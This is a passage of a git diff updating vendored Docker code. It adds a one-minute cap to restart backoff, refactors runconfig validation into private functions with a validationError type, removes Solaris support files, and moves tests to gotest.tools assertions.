+++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go
@@ -1,4 +1,4 @@
-package restartmanager
+package restartmanager // import "github.com/docker/docker/restartmanager"
 
 import (
 	"errors"
@@ -12,6 +12,7 @@ import (
 const (
 	backoffMultiplier = 2
 	defaultTimeout    = 100 * time.Millisecond
+	maxRestartTimeout = 1 * time.Minute
 )
 
 // ErrRestartCanceled is returned when the restart manager has been
@@ -35,7 +36,7 @@ type restartManager struct {
 	canceled     bool
 }
 
-// New returns a new restartmanager based on a policy.
+// New returns a new restartManager based on a policy.
 func New(policy container.RestartPolicy, restartCount int) RestartManager {
 	return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})}
 }
@@ -63,18 +64,22 @@ func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped
 	}
 
 	if rm.active {
-		return false, nil, fmt.Errorf("invalid call on active restartmanager")
+		return false, nil, fmt.Errorf("invalid call on an active restart manager")
 	}
 	// if the container ran for more than 10s, regardless of status and policy reset the
 	// the timeout back to the default.
 	if executionDuration.Seconds() >= 10 {
 		rm.timeout = 0
 	}
-	if rm.timeout == 0 {
+	switch {
+	case rm.timeout == 0:
 		rm.timeout = defaultTimeout
-	} else {
+	case rm.timeout < maxRestartTimeout:
 		rm.timeout *= backoffMultiplier
 	}
+	if rm.timeout > maxRestartTimeout {
+		rm.timeout = maxRestartTimeout
+	}
 
 	var restart bool
 	switch {
diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
index 20eced54d3..4b6f302479 100644
--- a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
+++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go
@@ -1,4 +1,4 @@
-package restartmanager
+package restartmanager // import "github.com/docker/docker/restartmanager"
 
 import (
 	"testing"
@@ -9,26 +9,28 @@ import (
 
 func TestRestartManagerTimeout(t *testing.T) {
 	rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager)
-	should, _, err := rm.ShouldRestart(0, false, 1*time.Second)
+	var duration = time.Duration(1 * time.Second)
+	should, _, err := rm.ShouldRestart(0, false, duration)
 	if err != nil {
 		t.Fatal(err)
 	}
 	if !should {
 		t.Fatal("container should be restarted")
 	}
-	if rm.timeout != 100*time.Millisecond {
-		t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout)
+	if rm.timeout != defaultTimeout {
+		t.Fatalf("restart manager should have a timeout of 100 ms but has %s", rm.timeout)
 	}
 }
 
 func TestRestartManagerTimeoutReset(t *testing.T) {
 	rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager)
 	rm.timeout = 5 * time.Second
-	_, _, err := rm.ShouldRestart(0, false, 10*time.Second)
+	var duration = time.Duration(10 * time.Second)
+	_, _, err := rm.ShouldRestart(0, false, duration)
 	if err != nil {
 		t.Fatal(err)
 	}
-	if rm.timeout != 100*time.Millisecond {
-		t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout)
+	if rm.timeout != defaultTimeout {
+		t.Fatalf("restart manager should have a timeout of 100 ms but has %s", rm.timeout)
 	}
 }
diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go
index 508681cfe0..cbacf47df3 100644
--- a/vendor/github.com/docker/docker/runconfig/config.go
+++ b/vendor/github.com/docker/docker/runconfig/config.go
@@ -1,14 +1,12 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"encoding/json"
-	"fmt"
 	"io"
 
 	"github.com/docker/docker/api/types/container"
 	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/pkg/sysinfo"
-	"github.com/docker/docker/volume"
 )
 
 // ContainerDecoder implements httputils.ContainerDecoder
@@ -17,19 +15,19 @@ type ContainerDecoder struct{}
 
 // DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder
 func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
-	return DecodeContainerConfig(src)
+	return decodeContainerConfig(src)
 }
 
 // DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder
 func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) {
-	return DecodeHostConfig(src)
+	return decodeHostConfig(src)
 }
 
-// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper
+// decodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper
 // struct and returns both a Config and a HostConfig struct
 // Be aware this function is not checking whether the resulted structs are nil,
 // it's your business to do so
-func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+func decodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
 	var w ContainerConfigWrapper
 
 	decoder := json.NewDecoder(src)
@@ -46,52 +44,38 @@ func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostCon
 		if w.Config.Volumes == nil {
 			w.Config.Volumes = make(map[string]struct{})
 		}
-
-		// Now validate all the volumes and binds
-		if err := validateMountSettings(w.Config, hc); err != nil {
-			return nil, nil, nil, err
-		}
 	}
 
 	// Certain parameters need daemon-side validation that cannot be done
 	// on the client, as only the daemon knows what is valid for the platform.
-	if err := ValidateNetMode(w.Config, hc); err != nil {
+	if err := validateNetMode(w.Config, hc); err != nil {
 		return nil, nil, nil, err
 	}
 
 	// Validate isolation
-	if err := ValidateIsolation(hc); err != nil {
+	if err := validateIsolation(hc); err != nil {
 		return nil, nil, nil, err
 	}
 
 	// Validate QoS
-	if err := ValidateQoS(hc); err != nil {
+	if err := validateQoS(hc); err != nil {
 		return nil, nil, nil, err
 	}
 
 	// Validate Resources
-	if err := ValidateResources(hc, sysinfo.New(true)); err != nil {
+	if err := validateResources(hc, sysinfo.New(true)); err != nil {
 		return nil, nil, nil, err
 	}
-	return w.Config, hc, w.NetworkingConfig, nil
-}
-
-// validateMountSettings validates each of the volumes and bind settings
-// passed by the caller to ensure they are valid.
-func validateMountSettings(c *container.Config, hc *container.HostConfig) error {
-	// it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 )
 
-	// Ensure all volumes and binds are valid.
-	for spec := range c.Volumes {
-		if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil {
-			return fmt.Errorf("invalid volume spec %q: %v", spec, err)
-		}
+	// Validate Privileged
+	if err := validatePrivileged(hc); err != nil {
+		return nil, nil, nil, err
 	}
-	for _, spec := range hc.Binds {
-		if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil {
-			return fmt.Errorf("invalid bind mount spec %q: %v", spec, err)
-		}
+
+	// Validate ReadonlyRootfs
+	if err := validateReadonlyRootfs(hc); err != nil {
+		return nil, nil, nil, err
 	}
 
-	return nil
+	return w.Config, hc, w.NetworkingConfig, nil
 }
diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go
index f1f9de5950..67d386969f 100644
--- a/vendor/github.com/docker/docker/runconfig/config_test.go
+++ b/vendor/github.com/docker/docker/runconfig/config_test.go
@@ -1,4 +1,4 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"bytes"
@@ -12,6 +12,8 @@ import (
 	"github.com/docker/docker/api/types/container"
 	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/api/types/strslice"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 type f struct {
@@ -26,11 +28,6 @@ func TestDecodeContainerConfig(t *testing.T) {
 		image    string
 	)
 
-	//TODO: Should run for Solaris
-	if runtime.GOOS == "solaris" {
-		t.Skip()
-	}
-
 	if runtime.GOOS != "windows" {
 		image = "ubuntu"
 		fixtures = []f{
@@ -51,7 +48,7 @@ func TestDecodeContainerConfig(t *testing.T) {
 			t.Fatal(err)
 		}
 
-		c, h, _, err := DecodeContainerConfig(bytes.NewReader(b))
+		c, h, _, err := decodeContainerConfig(bytes.NewReader(b))
 		if err != nil {
 			t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err))
 		}
@@ -75,9 +72,9 @@ func TestDecodeContainerConfig(t *testing.T) {
 // as to what level of container isolation is supported.
 func TestDecodeContainerConfigIsolation(t *testing.T) {
 
-	// An invalid isolation level
+	// An Invalid isolation level
 	if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil {
-		if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) {
+		if !strings.Contains(err.Error(), `Invalid isolation: "invalid"`) {
 			t.Fatal(err)
 		}
 	}
@@ -99,7 +96,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) {
 		}
 	} else {
 		if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil {
-			if !strings.Contains(err.Error(), `invalid --isolation: "process"`) {
+			if !strings.Contains(err.Error(), `Invalid isolation: "process"`) {
 				t.Fatal(err)
 			}
 		}
@@ -112,7 +109,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) {
 		}
 	} else {
 		if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil {
-			if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) {
+			if !strings.Contains(err.Error(), `Invalid isolation: "hyperv"`) {
 				t.Fatal(err)
 			}
 		}
@@ -135,5 +132,59 @@ func callDecodeContainerConfigIsolation(isolation string) (*container.Config, *c
 	if b, err = json.Marshal(w); err != nil {
 		return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error())
 	}
-	return DecodeContainerConfig(bytes.NewReader(b))
+	return decodeContainerConfig(bytes.NewReader(b))
+}
+
+type decodeConfigTestcase struct {
+	doc                string
+	wrapper            ContainerConfigWrapper
+	expectedErr        string
+	expectedConfig     *container.Config
+	expectedHostConfig *container.HostConfig
+	goos               string
+}
+
+func runDecodeContainerConfigTestCase(testcase decodeConfigTestcase) func(t *testing.T) {
+	return func(t *testing.T) {
+		raw := marshal(t, testcase.wrapper, testcase.doc)
+		config, hostConfig, _, err := decodeContainerConfig(bytes.NewReader(raw))
+		if testcase.expectedErr != "" {
+			if !assert.Check(t, is.ErrorContains(err, "")) {
+				return
+			}
+			assert.Check(t, is.Contains(err.Error(), testcase.expectedErr))
+			return
+		}
+		assert.Check(t, err)
+		assert.Check(t, is.DeepEqual(testcase.expectedConfig, config))
+		assert.Check(t, is.DeepEqual(testcase.expectedHostConfig, hostConfig))
+	}
+}
+
+func marshal(t *testing.T, w ContainerConfigWrapper, doc string) []byte {
+	b, err := json.Marshal(w)
+	assert.NilError(t, err, "%s: failed to encode config wrapper", doc)
+	return b
+}
+
+func containerWrapperWithVolume(volume string) ContainerConfigWrapper {
+	return ContainerConfigWrapper{
+		Config: &container.Config{
+			Volumes: map[string]struct{}{
+				volume: {},
+			},
+		},
+		HostConfig: &container.HostConfig{},
+	}
+}
+
+func containerWrapperWithBind(bind string) ContainerConfigWrapper {
+	return ContainerConfigWrapper{
+		Config: &container.Config{
+			Volumes: map[string]struct{}{},
+		},
+		HostConfig: &container.HostConfig{
+			Binds: []string{bind},
+		},
+	}
 }
diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go
index 4ccfc73be2..65e8d6fcd4 100644
--- a/vendor/github.com/docker/docker/runconfig/config_unix.go
+++ b/vendor/github.com/docker/docker/runconfig/config_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"github.com/docker/docker/api/types/container"
@@ -53,7 +53,7 @@ func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig {
 
 	// Make sure NetworkMode has an acceptable value. We do this to ensure
 	// backwards compatible API behavior.
-	hc = SetDefaultNetModeIfBlank(hc)
+	SetDefaultNetModeIfBlank(hc)
 
 	return hc
 }
diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go
index f2361b554b..cced59d4df 100644
--- a/vendor/github.com/docker/docker/runconfig/config_windows.go
+++ b/vendor/github.com/docker/docker/runconfig/config_windows.go
@@ -1,4 +1,4 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"github.com/docker/docker/api/types/container"
diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go
index bb72c1699c..038fe39660 100644
--- a/vendor/github.com/docker/docker/runconfig/errors.go
+++ b/vendor/github.com/docker/docker/runconfig/errors.go
@@ -1,46 +1,42 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/errors"
-)
-
-var (
+const (
 	// ErrConflictContainerNetworkAndLinks conflict between --net=container and links
-	ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior")
-	// ErrConflictUserDefinedNetworkAndLinks conflict between --net=<NETWORK> and links
-	ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior")
+	ErrConflictContainerNetworkAndLinks validationError = "conflicting options: container type network can't be used with links. This would result in undefined behavior"
 	// ErrConflictSharedNetwork conflict between private and other networks
-	ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network")
+	ErrConflictSharedNetwork validationError = "container sharing network namespace with another container or host cannot be connected to any other network"
 	// ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network.
-	ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network")
+	ErrConflictHostNetwork validationError = "container cannot be disconnected from host network or connected to host network"
 	// ErrConflictNoNetwork conflict between private and other networks
-	ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode")
+	ErrConflictNoNetwork validationError = "container cannot be connected to multiple networks with one of the networks in private (none) mode"
 	// ErrConflictNetworkAndDNS conflict between --dns and the network mode
-	ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode")
+	ErrConflictNetworkAndDNS validationError = "conflicting options: dns and the network mode"
 	// ErrConflictNetworkHostname conflict between the hostname and the network mode
-	ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode")
+	ErrConflictNetworkHostname validationError = "conflicting options: hostname and the network mode"
 	// ErrConflictHostNetworkAndLinks conflict between --net=host and links
-	ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior")
+	ErrConflictHostNetworkAndLinks validationError = "conflicting options: host type networking can't be used with links. This would result in undefined behavior"
 	// ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode
-	ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode")
+	ErrConflictContainerNetworkAndMac validationError = "conflicting options: mac-address and the network mode"
 	// ErrConflictNetworkHosts conflict between add-host and the network mode
-	ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode")
+	ErrConflictNetworkHosts validationError = "conflicting options: custom host-to-IP mapping and the network mode"
 	// ErrConflictNetworkPublishPorts conflict between the publish options and the network mode
-	ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode")
+	ErrConflictNetworkPublishPorts validationError = "conflicting options: port publishing and the container type network mode"
 	// ErrConflictNetworkExposePorts conflict between the expose option and the network mode
-	ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode")
+	ErrConflictNetworkExposePorts validationError = "conflicting options: port exposing and the container type network mode"
 	// ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address
-	ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only")
+	ErrUnsupportedNetworkAndIP validationError = "user specified IP address is supported on user defined networks only"
 	// ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured subnet and requested ip address
-	ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets")
+	ErrUnsupportedNetworkNoSubnetAndIP validationError = "user specified IP address is supported only when connecting to networks with user configured subnets"
 	// ErrUnsupportedNetworkAndAlias conflict between network mode and alias
-	ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks")
+	ErrUnsupportedNetworkAndAlias validationError = "network-scoped alias is supported only for containers in user defined networks"
 	// ErrConflictUTSHostname conflict between the hostname and the UTS mode
-	ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode")
+	ErrConflictUTSHostname validationError = "conflicting options: hostname and the UTS mode"
 )
 
-func conflictError(err error) error {
-	return errors.NewRequestConflictError(err)
+type validationError string
+
+func (e validationError) Error() string {
+	return string(e)
 }
+
+func (e validationError) InvalidParameter() {}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go
index 2b81d02c20..7d99e5acfa 100644
--- a/vendor/github.com/docker/docker/runconfig/hostconfig.go
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go
@@ -1,15 +1,16 @@
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"encoding/json"
 	"io"
+	"strings"
 
 	"github.com/docker/docker/api/types/container"
 )
 
 // DecodeHostConfig creates a HostConfig based on the specified Reader.
 // It assumes the content of the reader will be JSON, and decodes it.
-func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) {
+func decodeHostConfig(src io.Reader) (*container.HostConfig, error) {
 	decoder := json.NewDecoder(src)
 
 	var w ContainerConfigWrapper
@@ -25,11 +26,54 @@ func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) {
 // to default if it is not populated. This ensures backwards compatibility after
 // the validation of the network mode was moved from the docker CLI to the
 // docker daemon.
-func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig {
+func SetDefaultNetModeIfBlank(hc *container.HostConfig) {
 	if hc != nil {
 		if hc.NetworkMode == container.NetworkMode("") {
 			hc.NetworkMode = container.NetworkMode("default")
 		}
 	}
-	return hc
+}
+
+// validateNetContainerMode ensures that the various combinations of requested
+// network settings wrt container mode are valid.
+func validateNetContainerMode(c *container.Config, hc *container.HostConfig) error {
+	// We may not be passed a host config, such as in the case of docker commit
+	if hc == nil {
+		return nil
+	}
+	parts := strings.Split(string(hc.NetworkMode), ":")
+	if parts[0] == "container" {
+		if len(parts) < 2 || parts[1] == "" {
+			return validationError("Invalid network mode: invalid container format container:<name|id>")
+		}
+	}
+
+	if hc.NetworkMode.IsContainer() && c.Hostname != "" {
+		return ErrConflictNetworkHostname
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 {
+		return ErrConflictContainerNetworkAndLinks
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 {
+		return ErrConflictNetworkAndDNS
+	}
+
+	if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 {
+		return ErrConflictNetworkHosts
+	}
+
+	if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" {
+		return ErrConflictContainerNetworkAndMac
+	}
+
+	if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts) {
+		return ErrConflictNetworkPublishPorts
+	}
+
+	if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 {
+		return ErrConflictNetworkExposePorts
+	}
+	return nil
 }
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
deleted file mode 100644
index 83ad32ecc7..0000000000
--- a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package runconfig
-
-import (
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/pkg/sysinfo"
-)
-
-// DefaultDaemonNetworkMode returns the default network stack the daemon should
-// use.
-func DefaultDaemonNetworkMode() container.NetworkMode {
-	return container.NetworkMode("bridge")
-}
-
-// IsPreDefinedNetwork indicates if a network is predefined by the daemon
-func IsPreDefinedNetwork(network string) bool {
-	return false
-}
-
-// ValidateNetMode ensures that the various combinations of requested
-// network settings are valid.
-func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
-	// We may not be passed a host config, such as in the case of docker commit
-	return nil
-}
-
-// ValidateIsolation performs platform specific validation of the
-// isolation level in the hostconfig structure.
-// This setting is currently discarded for Solaris so this is a no-op.
-func ValidateIsolation(hc *container.HostConfig) error {
-	return nil
-}
-
-// ValidateQoS performs platform specific validation of the QoS settings
-func ValidateQoS(hc *container.HostConfig) error {
-	return nil
-}
-
-// ValidateResources performs platform specific validation of the resource settings
-func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go
index a6a2b34fc1..b04cbc6bc3 100644
--- a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"bytes"
@@ -10,6 +10,8 @@ import (
 
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/pkg/sysinfo"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 // TODO Windows: This will need addressing for a Windows daemon.
@@ -61,43 +63,33 @@ func TestNetworkModeTest(t *testing.T) {
 }
 
 func TestIpcModeTest(t *testing.T) {
-	ipcModes := map[container.IpcMode][]bool{
-		// private, host, container, valid
-		"":                         {true, false, false, true},
-		"something:weird":          {true, false, false, false},
-		":weird":                   {true, false, false, true},
-		"host":                     {false, true, false, true},
-		"container:name":           {false, false, true, true},
-		"container:name:something": {false, false, true, false},
-		"container:":               {false, false, true, false},
+	ipcModes := map[container.IpcMode]struct {
+		private   bool
+		host      bool
+		container bool
+		shareable bool
+		valid     bool
+		ctrName   string
+	}{
+		"":                      {valid: true},
+		"private":               {private: true, valid: true},
+		"something:weird":       {},
+		":weird":                {},
+		"host":                  {host: true, valid: true},
+		"container":             {},
+		"container:":            {container: true, valid: true, ctrName: ""},
+		"container:name":        {container: true, valid: true, ctrName: "name"},
+		"container:name1:name2": {container: true, valid: true, ctrName: "name1:name2"},
+		"shareable":             {shareable: true, valid: true},
 	}
+
 	for ipcMode, state := range ipcModes {
-		if ipcMode.IsPrivate() != state[0] {
-			t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate())
-		}
-		if ipcMode.IsHost() != state[1] {
-			t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost())
-		}
-		if ipcMode.IsContainer() != state[2] {
-			t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer())
-		}
-		if ipcMode.Valid() != state[3] {
-			t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid())
-		}
-	}
-	containerIpcModes := map[container.IpcMode]string{
-		"":                      "",
-		"something":             "",
-		"something:weird":       "weird",
-		"container":             "",
-		"container:":            "",
-		"container:name":        "name",
-		"container:name1:name2": "name1:name2",
-	}
-	for ipcMode, container := range containerIpcModes {
-		if ipcMode.Container() != container {
-			t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container())
-		}
+		assert.Check(t, is.Equal(state.private, ipcMode.IsPrivate()), "IpcMode.IsPrivate() parsing failed for %q", ipcMode)
+		assert.Check(t, is.Equal(state.host, ipcMode.IsHost()), "IpcMode.IsHost()  parsing failed for %q", ipcMode)
+		assert.Check(t, is.Equal(state.container, ipcMode.IsContainer()), "IpcMode.IsContainer()  parsing failed for %q", ipcMode)
+		assert.Check(t, is.Equal(state.shareable, ipcMode.IsShareable()), "IpcMode.IsShareable()  parsing failed for %q", ipcMode)
+		assert.Check(t, is.Equal(state.valid, ipcMode.Valid()), "IpcMode.Valid()  parsing failed for %q", ipcMode)
+		assert.Check(t, is.Equal(state.ctrName, ipcMode.Container()), "IpcMode.Container() parsing failed for %q", ipcMode)
 	}
 }
 
@@ -167,11 +159,11 @@ func TestPidModeTest(t *testing.T) {
 func TestRestartPolicy(t *testing.T) {
 	restartPolicies := map[container.RestartPolicy][]bool{
 		// none, always, failure
-		container.RestartPolicy{}:                {true, false, false},
-		container.RestartPolicy{"something", 0}:  {false, false, false},
-		container.RestartPolicy{"no", 0}:         {true, false, false},
-		container.RestartPolicy{"always", 0}:     {false, true, false},
-		container.RestartPolicy{"on-failure", 0}: {false, false, true},
+		{}: {true, false, false},
+		{Name: "something", MaximumRetryCount: 0}:  {false, false, false},
+		{Name: "no", MaximumRetryCount: 0}:         {true, false, false},
+		{Name: "always", MaximumRetryCount: 0}:     {false, true, false},
+		{Name: "on-failure", MaximumRetryCount: 0}: {false, false, true},
 	}
 	for restartPolicy, state := range restartPolicies {
 		if restartPolicy.IsNone() != state[0] {
@@ -199,14 +191,12 @@ func TestDecodeHostConfig(t *testing.T) {
 			t.Fatal(err)
 		}
 
-		c, err := DecodeHostConfig(bytes.NewReader(b))
+		c, err := decodeHostConfig(bytes.NewReader(b))
 		if err != nil {
 			t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err))
 		}
 
-		if c.Privileged != false {
-			t.Fatalf("Expected privileged false, found %v\n", c.Privileged)
-		}
+		assert.Check(t, !c.Privileged)
 
 		if l := len(c.Binds); l != 1 {
 			t.Fatalf("Expected 1 bind, found %d\n", l)
@@ -217,7 +207,7 @@ func TestDecodeHostConfig(t *testing.T) {
 		}
 
 		if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" {
-			t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop)
+			t.Fatalf("Expected CapDrop NET_ADMIN, got %v", c.CapDrop)
 		}
 	}
 }
@@ -276,7 +266,7 @@ func TestValidateResources(t *testing.T) {
 		si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod
 		si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime
 
-		if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected {
+		if err := validateResources(&hc, &si); (err != nil) != rt.ErrorExpected {
 			t.Fatal(rt.FailureMsg, err)
 		}
 	}
diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
index 6e2b7f5ff7..e579b06d9b 100644
--- a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
+++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go
@@ -1,11 +1,10 @@
-// +build !windows,!solaris
+// +build !windows
 
-package runconfig
+package runconfig // import "github.com/docker/docker/runconfig"
 
 import (
 	"fmt"
 	"runtime"
-	"strings"
 
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/pkg/sysinfo"
@@ -20,25 +19,20 @@ func DefaultDaemonNetworkMode() container.NetworkMode {
 // IsPreDefinedNetwork indicates if a network is predefined by the daemon
 func IsPreDefinedNetwork(network string) bool {
 	n := container.NetworkMode(network)
-	return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress"
+	return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault()
 }
 
-// ValidateNetMode ensures that the various combinations of requested
+// validateNetMode ensures that the various combinations of requested
 // network settings are valid.
-func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
+func validateNetMode(c *container.Config, hc *container.HostConfig) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
-	parts := strings.Split(string(hc.NetworkMode), ":")
-	if parts[0] == "container" {
-		if len(parts) < 2 || parts[1] == "" {
-			return fmt.Errorf("--net: invalid net mode: invalid container format container:<name|id>")
-		}
-	}
 
-	if hc.NetworkMode.IsContainer() && c.Hostname != "" {
-		return ErrConflictNetworkHostname
+	err := validateNetContainerMode(c, hc)
+	if err != nil {
+		return err
 	}
 
 	if hc.UTSMode.IsHost() && c.Hostname != "" {
@@ -49,81 +43,68 @@ func ValidateNetMode(c *container.Config, hc *container.HostConfig) error {
 		return ErrConflictHostNetworkAndLinks
 	}
 
-	if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 {
-		return ErrConflictContainerNetworkAndLinks
-	}
-
-	if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 {
-		return ErrConflictNetworkAndDNS
-	}
-
-	if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 {
-		return ErrConflictNetworkHosts
-	}
-
-	if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" {
-		return ErrConflictContainerNetworkAndMac
-	}
-
-	if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) {
-		return ErrConflictNetworkPublishPorts
-	}
-
-	if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 {
-		return ErrConflictNetworkExposePorts
-	}
 	return nil
 }
 
-// ValidateIsolation performs platform specific validation of
+// validateIsolation performs platform specific validation of
 // isolation in the hostconfig structure. Linux only supports "default"
 // which is LXC container isolation
-func ValidateIsolation(hc *container.HostConfig) error {
+func validateIsolation(hc *container.HostConfig) error {
 	// We may not be passed a host config, such as in the case of docker commit
 	if hc == nil {
 		return nil
 	}
